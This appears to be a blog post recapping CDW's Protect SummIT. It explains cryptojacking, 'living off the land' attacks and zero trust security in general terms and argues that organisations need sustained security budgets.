Pop quiz, cybersecurity hotshot:
- Does your organization have a plan in place to prevent “cryptojacking?”
- What techniques are you deploying to defend against attackers “living off the land” (LotL) on you network?
- Have you deployed a “zero trust” strategy in your environment to address insider threats?
These were some of the questions being posed to attendees at CDW’s recent Protect SummIT in Philadelphia. They caught my ear because they were all new security terms for me.
The fact that they were not familiar to me, someone who follows and writes about the security market, points to the dizzying speed of the cybersecurity industry. If your security posture is not staying up to date to meet these new challenges, your organization is likely at risk.
So because this may be the first time you are hearing these terms, too, let me break them down for you.
Cryptojacking Bogs Down Machines
Cryptojacking is the unauthorized use of a computer’s CPU resources to mine cryptocurrency. The cryptomining software is introduced either by code injection or through a phishing attack. It’s a very easy, low risk and passive way for hackers to mine cryptocurrency. This can harm an organization by slowing performance on users’ PCs and racking up help desk hours trying to diagnose and address the problem.
“Living Off the Land” Is Among the Latest Malware-Free Attacks
Attackers making use of LotL tactics present a growing challenge to organizations. LotL involves using native tools and features on the host computer to remain undetected while pursing malicious objectives like exfiltrating or destroying data. This allows the hacker’s activities to hide in plain sight, blending into other legitimate activities on the network. It also makes attribution more difficult, as attackers are using the same everyday tools rather than specialized code that’s easier to attribute.
Such detection evasion techniques have grown more popular with attackers. The 2019 CrowdStrike Global Threat Report states that these kinds of malware-free attacks grew by 40 percent in 2018.
Zero Trust Model Boosts Organizationwide Security
Knowing that attackers are looking to dwell within an environment for as long as they can, remaining undetected and masking their malicious activities, organizations can no longer assume that anything within their perimeter defenses is safe. They must “never trust and always verify,” an update of the traditional security approach of “trust but verify.” This is the thinking behind a zero trust approach to security.
Zero trust defense techniques are focused on preventing the lateral movement of attackers within an environment. Many intrusions come through weaknesses in the environment’s perimeter and require movement within the network to get to the real objective of the breach. This being such a common tactic, the logical countermeasure is to make such lateral movement difficult. A zero trust strategy typically involves microsegmentation of the network and enforcing access and identity control points between segments to limit this kind of unauthorized traffic.
Making the Case for Security Budget
Is your head spinning? The velocity at which these new attack techniques develop really puts some perspective on the notion that security is not an end zone that you cross and then you’re safe. It is a process, an ongoing, ever-evolving business need that requires constant attention — and budget.
This brings me to another observation from the Protect SummIT. I overheard conversation after conversation among security professionals mentioning the difficulty of securing sufficient budget to protect their organizations… in 2019. And while progress is being made — Radware reports that 98 percent of C-suite executives recognize that they have some management responsibility for security — these conversations point to a need for continued advancements in bringing business executives into alignment with security needs.
Maybe they need to take the pop quiz to really see the risk that’s out there.